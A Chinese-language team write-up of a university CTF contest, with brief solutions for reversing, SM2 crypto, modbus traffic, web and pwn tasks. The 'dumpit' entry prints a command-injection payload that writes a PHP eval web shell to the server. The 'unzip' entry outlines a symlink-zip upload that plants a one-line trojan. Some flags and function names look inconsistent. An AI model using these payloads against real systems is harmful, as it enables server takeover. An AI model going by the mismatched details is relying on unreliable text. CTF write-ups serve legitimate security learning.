来一次全国大赛——大学生信息安全国赛WP解题过程经验

一、前言

大家好，我是spider我又来给同学们做比赛分享啦，其中内容是我们整个队伍的wp报告，有很多的解题思路大家可以看看学习一下喔

解题过程

1 签到卡

操作内容：
题目提示python，直接python读文件

如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：
flag{17a6db89-f1c3-4ea2-8b15-76c206e23758}

2 被加密的生产流量

操作内容：
题目为modbus流量，进行分析

追踪流

Base32编码 解码得到flag

flag值：
c1f_fi1g_1000

3、可信度量

连接ssh，全局搜索flag

flag值：
flag{cbef0df4-bdbe-4d1e-8282-61904188e135}

4、烧烤摊

操作内容：
直接覆盖内存即可
如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：
flag{cbef0d9-bdbe-4d4e-8282-61904188e1857}

ezbyte

操作内容：
ida逆向找到关键逻辑sub_404021

__int64 __fastcall sub_404D25(__int64 a1, __int64 a2, __int64 a3, __int64 a4, int a5, int a6)
{
  __int64 v6; // rax
  __int64 result; // rax
  __int64 v8[2]; // [rsp+10h] [rbp-420h] BYREF
  char v9[1008]; // [rsp+20h] [rbp-410h] BYREF
  unsigned __int64 v10; // [rsp+418h] [rbp-18h]

  v10 = __readfsqword(0x28u);
  v8[0] = 0LL;
  v8[1] = 0LL;
  memset(v9, 0, sizeof(v9));
  sub_4D1840((unsigned int)"%100s", (unsigned int)v8, (unsigned int)v9, 0, a5, a6);
  v6 = sub_46F4F0(&unk_5D5520, v8);
  sub_46E060(v6, sub_46EE20);
  sub_404C21((unsigned __int8 *)v8);
  result = 0LL;
  if ( __readfsqword(0x28u) != v10 )
    sub_535290();
  return result;
}
__int64 __fastcall sub_404C21(unsigned __int8 *a1)
{
  __int64 result; // rax

  result = *a1;
  if ( (_BYTE)result == 'f' )
  {
    result = a1[1];
    if ( (_BYTE)result == 'l' )
    {
      result = a1[2];
      if ( (_BYTE)result == 'a' )
      {
        result = a1[3];
        if ( (_BYTE)result == 'g' )
        {
          result = a1[4];
          if ( (_BYTE)result == 123 )
          {
            result = a1[41];
            if ( (_BYTE)result == 125 )
            {
              result = a1[40];
              if ( (_BYTE)result == 49 )
              {
                result = a1[39];
                if ( (_BYTE)result == 54 )
                {
                  result = a1[38];
                  if ( (_BYTE)result == 56 )
                  {
                    result = a1[37];
                    if ( (_BYTE)result == 51 )
                      sub_404BF5();
                  }
                }
              }
            }
          }
        }
      }
    }
  }
  return result;
}

readelf读取堆栈信息

DW_CFA_val_expression: r12 (r12) (DW_OP_constu: 8722213363631027234; DW_OP_constu: 1890878197237214971; DW_OP_constu: 9123704; DW_OP_breg15 (r15): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 2451795628338718684; DW_OP_constu: 1098791727398412397; DW_OP_constu: 1512312; DW_OP_breg14 (r14): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 8502251781212277489; DW_OP_constu: 1209847170981118947; DW_OP_constu: 8971237; DW_OP_breg13 (r13): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_constu: 2616514329260088143; DW_OP_constu: 1237891274917891239; DW_OP_constu: 1892739; DW_OP_breg12 (r12): 0; DW_OP_plus; DW_OP_xor; DW_OP_xor; DW_OP_plus; DW_OP_plus; DW_OP_plus)

求解出R12-R15
加上sub_404021中的3861得到flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}
flag值：
flag{e609efb5-e70e-4e94-ac69-ac31d96c3861}

国密算法

本地生成sm2的公私钥

Private_Key = BFFD2FE38BF5C0B97CDA22E2AF425DCBA4F837A1A0318FF4E41CC1B6A084BA6B

Public_Key = 4DA34811AFA50733A33C010572A3D1E1218A1792FF9D87F97D1166A121B10E180F3FD952B6A9D0E19673BEBA9741C27A08EC64C604F4CDD8F9CD39CA9375E52E

按照题目进行传参获取到唯一的ID

json
{
  "message": "success",
  "data": {
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030"
  }
}

传参公钥，获取服务器返回的私钥内容和随机数

json
{
  "message": "success",
  "data": {
    "publicKey": "04a9e33a5a306d67fe75c90b8d25ec40a843916501344f3be11193b789b6344a427b041f56df6d897c9b3d75de24a5e537882a74aa8433036c6f0626dd60365e0e",
    "privateKey": "f9a20c70d24eb917f8d4293be839337457724033f93ee8af76e5ff5493820713",
    "randomString": "de4ee03e27f12ce174f8cfcbe992120b28d8a1a0571f4b3b414589d9f22d1e013c0c9d714d1aff129eea1247e632a57031026a39643f35f1126e88d2bf0124d7e222b2d6128f62ae3d82ce67659a6a81f10d8883ef1ea5e004a1ff36a18be1ee275f827798e264213702b73b291a8235",
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030"
  }
}

使用本地私钥对randomstring解密，然后使用其对服务器返回的私钥解密。

解密内容如下

AE 5F E0 3E 4C 31 6C 91  B4 E2 89 A7 6D A2 B5 B9 27 D1 FC 7F 21 0C B3 DA  2E 12 5F 63 EF B7 22 98

传参ID获取服务器返回的加密随机数

json
{
  "message": "success",
  "data": {
    "id": "28056b31-4e1b-4c54-a08e-3ce6005b4030",
    "quantumString": "13f7b23b6309a6a973a525ee3f99963b86f19ea6bb15e47e682b3ea50e4d0d49f11d5c0510c21c30ec361b5ff0a60fa21ebdbced36858797680a925d5b4d5f584e96524b6be9a84610d4c3b704bbc59dd370bf9ad6724f954aae407cfaea62c3e4cb6bdbd84facfb5da0f46806f32c2e"
  }
}

使用上述密钥解密内容，然后传参check
获取flag
flag{634d7a14-f0b6-4f71-a935-bddf5835f015}

unzip

新建一个目录
到目录下创建软连接
然后打一个压缩包
zip —symlinks test.zip ./*

然后在到上级目录在新建一个test目录进去
创建一个shell文件

然后返回上一级打压缩包zip -r test1.zip test

然后先上传第一个压缩包之后
在上传第二个压缩包
记得抓包改一下content-type

再上传一句话木马即可

dumpit

操作内容：

use ?db=&table_2_query= or ?db=&table_2_dump= to view the tables! etc:?db=ctf&table_2_query=flag1

考查sql注入
不过flag都是假的，?db=&table_2_dump=发现有日志，联想通过日志getsheell

http://eci-2ze8hwdukyef6c2sjsey.cloudeci1.ichunqiu.com:8888/?db=ctf&amp;table_2_dump=flag1%0Aecho "<?php <span class="label label-primary">@eval(getallheaders()['User-Agent'])?</span>>" &gt; "/app/log/4.php"%0A

访问4.php即可
运行env即可得到flag

flag值：
flag{7e519224-df95-41a5-8dd4-b391064bdf58}

funcanary

操作内容：
逐字节爆破canary，有后门在0x1229处，部分地址写低16字节，一字节爆破
如该题使用自己编写的脚本代码请详细写出，不允许截图

flag值：
flag{78368a9c-a068-47c1-9816-06683c2246b0}

近一段时间以来的自勉总结

知识如果没有归纳、分类，到最终也不会总结出自己的东西。不要盲目追随他人的脚步，你要玩出自己的节奏，每个人都有自己的人生进度条儿，努力即可，事在人为，冲鸭！！！！